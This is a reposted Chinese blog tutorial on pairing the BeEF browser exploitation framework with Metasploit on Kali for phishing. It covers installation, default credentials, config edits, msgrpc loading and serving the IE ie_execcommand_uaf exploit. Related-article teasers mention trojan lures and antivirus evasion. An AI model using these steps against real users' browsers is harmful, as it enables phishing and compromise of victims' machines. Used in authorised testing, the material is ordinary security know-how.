beef结合msf钓鱼

最新推荐文章于 2024-07-23 20:59:24 发布

weixin_34174132

最新推荐文章于 2024-07-23 20:59:24 发布

阅读量663

点赞数

文章标签：操作系统开发工具

原文链接：http://blog.51cto.com/biock/1621563

版权

Kali linux 系统默认未安装beef，需要自行安装

1 2	`apt-get update` `apt-get` `install` `beef-xss`

启动/usr/share/beef-xss

1 2	`cd` `/usr/share/beef-xss` `.` `/beef`

账号密码

127.0.0.1：3000/ui/pannel

beef/beef

嵌入代码

与Metasploit联动

Beef配置文件

/usr/share/beef-xss/config.yaml

1 2	`metasploit:` `enable` `:` `false`

改成

1 2	`metasploit:` `enable` `:` `true`

vim /usr/share/beef-xss/extensions/metasploit/config.yaml

原：

1	`{os:` `'custom'` `, path:` `''` `}`

修改成

1	`{os:` `'custom'` `, path:` `'/usr/share/metasploit-framework/'` `}`

修改 host callback_host两参数，改为beef主机IP

重启postgresq、metasploit、服务

1	`service postgresql restart & service metasploit restart`

msfconsole #启动Metasploit

1	`load msgrpc ServerHost=IP Pass=abc123`

MSF设置：

use exploit /windows/browser/ie_execcommand_uaf

show options

set srvhost IP

exploit /run

转载于:https://blog.51cto.com/biock/1621563

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_34174132

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

MSF 综合利用： BEEF & XSS攻击（炊少教学）

weiliang369的博客

02-27

390

获得Beef 先安装git apt-get install git brk@Dis9Team:/pen$ sudo git clone https://github.com/beefproject/beef 配置和安装数据库支持： apt-get install libssl-dev libsqlite3-dev sqlite 我用sqlite数据库简单不麻烦 RUBY配置： brk@Dis9Team:/pen/beef$ sudo gem install bundler Fetch

BeEF新手记录

OldBowl

11-29

2896

beef 新手

参与评论您还未登录，请先登录后发表或查看评论

xss——flash钓鱼（kali MSF捆绑钓鱼）超详细！小白也可以！

最新发布

qq_48368964的博客

07-23

1512

kali系统虚拟机（攻击者监听设备、制作木马），Win10物理机（受害者目标主机），winrar压缩软件（用于伪装木马）,phpstudy(搭建模拟钓鱼网站)

kali beef + msf整合可用配置

x631617479的博客

12-30

840

配置beef开启msf vim /usr/share/beef-xss/config,yaml 开启msf配置 vim /usr/share/beef-xss/extensions/metasploit/config.yaml 启动beef 一定要先到beef路径使用./ 启动 cd /usr/share/beef-xss/ ./beef 判断是否成功 ...

beef + msf 实现内网渗透

weixin_30416497的博客

04-10

573

在内网渗透方面，最为大众所知道的就是xp系统的ms08067漏洞，通过这个漏洞可以对未打上补丁的xp系统实现getshell，但是经过笔者发现，这种漏洞攻击在被攻击机开上windows防火墙的时候是没用的（连ping都会被拒绝），但是arp+dns欺骗仍然是可行的那么问题来了，我们如何通过内网欺骗来getshell？在被攻击机开启防火墙的时候，可以看到使用ms08067漏洞未...

beef-xss钓鱼

Williamanddog的博客

01-27

658

BeEF（Browser Exploitation Framework）是一款非常强大的Web框架攻击平台，集成了许多 payload，可以通过XSS漏洞配合JavaScript脚本和Metasploit进行渗透。如果你的kali中没有beef的话，执行sudo apt install beef-xss进行安装。_ip:3000/clone_pikachu ，可以看到beef中有机器上线，在页面中进行登录。找到配置文件/usr/share/beef-xss/config.yaml。回到前台查看是否一致。

kali linux 中实现beef和msf关联出现问题解决

jcoiwenwfkowe的博客

10-01

129

kali linux 中实现beef和msf关联出现问题解决

kali安装keylogger_Kali Linux启动Beef-Xss漏洞利用框架教程:

weixin_35515918的博客

12-24

364

注:首先将默认浏览器的IP地址设为本机回环代理地址，IP格式:127.0.0.1，Port:8080，勾选Socks5，勾选Remote DNS，设置完成！root@kali:~# cd /user/share/beef-xssroot@kali:~# beef-xss注:开启后自动跳转到Beef登录界面，链接:http://127.0.0.1/3000/ui/authentication，默认用...

使用wifi-pumpkin搭建钓鱼wifi（仅供学习用途）

热门推荐

qq_42001855的博客

08-14

1万+

实验软件及工具 WiFi-Pumpkin WiFi-Pumpkin是一款专用于无线环境渗透测试的完整框架，利用该工具可以伪造接入点完成中间人攻击，同时也支持一些其他的无线渗透测试功能。旨在提供更安全的无线网络服务，该工具可以用来监听目标的流量数据，通过无线钓鱼的方式来捕获不知情的用户，以此来达到监控目标用户数据流量的目的，WiFi-Pumpkin的安装过程将会在漏洞利用中详细讲解。 BEEF...

杀毒与免杀技术详解---白嫖党福音

01-15

1825

0x01 简介不管是社工钓鱼，还是一句话木马getshell，远控，亦或者是反弹shell，都会遇到杀软waf这些大敌，当然主要还是杀软，因此我们不得不考虑免杀进而实现我们渗透测试目的。 0x02 概念 2.1 免杀类别简单总结下我知道的免杀类别：一句话木马绕狗（我觉得他不应该出现在这里，但为了致敬我学习的第一个免杀，把他放了出来）文件不落地 shellcode加密修改源码增加花指令 DLL加载自定义加载器指定特定的运行方式加壳当然还可以按照大的类别划分静态扫描免杀

网络渗透学习笔记

weixin_45753182的博客

04-20

2784

内网环境配置域不同域之间的访问称为跨域访问信任是可以传递的为域控win2008配置静态ip，cmd中输入ncpa.cpl.配置完后，在cmd中输入dcpromo 创建dns是为了解析域名 win7 配置服务器就行此时可以ping通域控命令：清空dns缓存的 win2008中配好后的有注册的记录 win7加入了cxh.com域在win7中登录win2008域控主机，win2008主机就自动关机了问题: ...

metasploit联动beef启动

weixin_30535843的博客

06-13

137

（温馨提示：请按照步骤来，否则beef到后面会启动不了）我们首先进入vim /usr/share/beef-xss/config.yaml 找到metasploit把它改为启动把false改为true ：wq！保存退出进入beef下的extensions/metasploit目录，并用vim打开config.yaml配置文件把host那改为本地ip 在这里填入m...

BeEf：利用跨站脚本漏洞进行钓鱼

qq_42773814的博客

01-19

2603

BeEf 简介 BeEf 是目前最为流行的 Web 框架攻击平台，专注于利用浏览器漏洞，它的全称是 The Browser Exploitation Framework 。 BeEf 提供一个 Web 界面来进行操作，只要访问了嵌入 hook.js 的页面，抑或执行了 hook.js 文件的浏览器，就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。最新的kali系统已经不会默认安装 BeEf ，需要我们自行安装。 apt install beef-xss 安装完成后，直接

kali下BeEF联合Metasploit

weixin_45524984的博客

12-02

292

kali下BEeF联合Metasploit Metasploit大概就是一个可以用很厉害的工具之类的…… 前几天玩KALI的时候见到有朋友联合BEeF和Metasploit，这样就可以在BEeF里面用Metasploit啦！这篇文章很受用： kali下安装beef并联合Metasploit 原文有两个地方要注意 1、运行beef时不要把Metasploit关掉啊QAQ！ 2、Metasploit的load msgrpc ServerHost=x.x.x.x Pass=abc123这里，这个abc123时默认

MSF&Powershell进行钓鱼攻击

weixin_44508748的博客

04-26

2488

一、Powershell配合MSF无文件攻击实验环境：靶机：win 7 >192.168.1.9 攻击机：kali>192.168.1.7 web服务器：win 10 > 192.168.1.6 本次实验的大致过程如下: MSF生成payload并放到靶机能够访问的服务器上，攻击者通过钓鱼等方式使靶机执行powershell代码，靶机反弹到msf监听的端口上建立会话，由此攻击...

ms10_002（极光漏洞）渗透步骤——MSF搭建钓鱼网站

渗透测试

06-07

2129

本文简单介绍了如何使用metasploit针对ms10_002（极光漏洞）进行渗透测试，仅供学习测试环境描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192.168.1.106 ①启动msf，搜索ms10_002，使用msf中的exploit攻击模块，设置参数 msf6 > search ms10_002 Matching Modules ================ # Name .

Kali之Beef利用Xss进行钓鱼

My灬Futrue的博客

07-07

1811

1、操作准备攻击机：Kali（ip地址：192.168.1.107）受害者：Windows7 x64（ip地址：192.168.1.163） 2、配置Beef 进入beef的配置文件里 root@kali:~# vim /etc/beef-xss/config.yaml 在这里可以看到beef的默认用户名和密码，也可以进行修改，我这里对默认的密码进行了修改注：（默认beef用户名和密码位User：beef，Password：beef） 3、启动Beef root@kali:~# beef-xss

MSF&Powershell钓鱼攻击

p01son的博客

06-02

361

Powershell是windows下面非常强大的命令行工具，Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。除此之外，使用powershell能很好的bypass各种AV，在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。

Beef插件功能详解：网页数据提取与安全测试

与Metasploit Framework（msf）结合使用时，BeEF可以增强对目标系统的攻击面。以下是一些BeEF插件的功能详解： 1. **ModuleTree(模块树)**：这是BeEF插件组织结构的表示，用户可以通过模块树来选择和运行不同的攻击...